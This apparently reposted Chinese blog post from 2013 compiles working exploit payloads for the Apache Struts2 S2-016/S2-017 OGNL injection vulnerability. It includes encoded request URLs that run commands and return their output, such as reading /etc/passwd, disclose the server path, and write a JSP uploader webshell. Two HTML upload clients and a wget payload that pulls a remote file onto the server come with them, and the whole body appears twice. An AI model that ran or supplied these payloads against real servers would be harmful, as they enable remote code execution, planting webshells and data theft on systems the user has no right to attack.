Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理
2013-07-31 00:17
253 查看
以下是Struts2 S2-016/S2-017漏洞 命令执行整理
带回显命令执行
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew
java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
爆路径
http://www.example.com/struts2-blank/example/X.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
写文件
http://www.example.com/struts2-blank/example/X.action?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
写入的文件内容:
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
其实就是一个jsp的小马,需要客户端配合
函数f是文件名,t是内容
客户端:
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
<center>
<input type=submit value="提交">
</form>
就在当前目录建立一个fjp.jsp
shell:http://www.example.com/struts2-blank/example/fjp.jsp
还有@园长的一个客户端:
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>jsp-园长</title>
</head>
<style>
.main{width:980px;height:600px;margin:0 auto;}
.url{width:300px;}
.fn{width:60px;}
.content{width:80%;height:60%;}
</style>
<script>
function upload(){
var url = document.getElementById('url').value,
content = document.getElementById('content').value,
fileName = document.getElementById('fn').value,
form = document.getElementById('fm');
if(url.length == 0){
alert("Url not allowd empty!");
return ;
}
if(content.length == 0){
alert("Content not allowd empty!");
return ;
}
if(fileName.length == 0){
alert("FileName not allowd empty!");
return ;
}
form.action = url;
form.submit();
}
</script>
<body>
<div class="main">
<form id="fm" method="post">
URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
<a href="javascript:upload();">Upload</a>
<textarea id="content" class="content" name="t" ></textarea>
</form>
</div>
</body>
</html>
还有@X发的一个wget的getshell
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println
(%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
转载自http://www.xinyues.org/thread-1385-1-1.html
原文链接:http://winbule.com/struts2-s2-016s2-017.html
MSF 利用模块 https://dev.metasploit.com/redmine/projects/framework/repository/revisions/master/entry/modules/exploits/multi/http/struts_default_action_mapper.rb
win cmd 下执行
echo 一句话代码 >> "服务器路径\test.jsp"
带回显命令执行
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew
java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
爆路径
http://www.example.com/struts2-blank/example/X.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
写文件
http://www.example.com/struts2-blank/example/X.action?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
写入的文件内容:
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
其实就是一个jsp的小马,需要客户端配合
函数f是文件名,t是内容
客户端:
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
<center>
<input type=submit value="提交">
</form>
就在当前目录建立一个fjp.jsp
shell:http://www.example.com/struts2-blank/example/fjp.jsp
还有@园长的一个客户端:
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>jsp-园长</title>
</head>
<style>
.main{width:980px;height:600px;margin:0 auto;}
.url{width:300px;}
.fn{width:60px;}
.content{width:80%;height:60%;}
</style>
<script>
function upload(){
var url = document.getElementById('url').value,
content = document.getElementById('content').value,
fileName = document.getElementById('fn').value,
form = document.getElementById('fm');
if(url.length == 0){
alert("Url not allowd empty!");
return ;
}
if(content.length == 0){
alert("Content not allowd empty!");
return ;
}
if(fileName.length == 0){
alert("FileName not allowd empty!");
return ;
}
form.action = url;
form.submit();
}
</script>
<body>
<div class="main">
<form id="fm" method="post">
URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
<a href="javascript:upload();">Upload</a>
<textarea id="content" class="content" name="t" ></textarea>
</form>
</div>
</body>
</html>
还有@X发的一个wget的getshell
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println
(%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
转载自http://www.xinyues.org/thread-1385-1-1.html
原文链接:http://winbule.com/struts2-s2-016s2-017.html
MSF 利用模块 https://dev.metasploit.com/redmine/projects/framework/repository/revisions/master/entry/modules/exploits/multi/http/struts_default_action_mapper.rb
win cmd 下执行
echo 一句话代码 >> "服务器路径\test.jsp"
相关文章推荐
- Struts2 S2-016,S2-017远程代码执行漏洞解决,修复
- 漏洞--Struts2远程命令执行S2-016
- Struts2远程命令执行漏洞 S2-045 源码分析
- 【S2-053】Struts2远程命令执行漏洞(CVE-2017-12611)
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- Struts2 S2-020在Tomcat 8下的命令执行分析
- struts2 最新S2-016-S2-017漏洞通杀struts2所有版本
- Struts2 远程执行代码(S2-016) 利用工具
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- struts2最新s2-016代码执行漏洞CVE-2013-2251
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- 9.漏洞验证系列--Apache Struts2 远程命令执行(S2-045)
- Struts2-S2-032远程命令执行EXP
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- struts2 最新漏洞 S2-016、S2-017修补方案
- Struts2 高危漏洞修复方案 (S2-016/S2-017)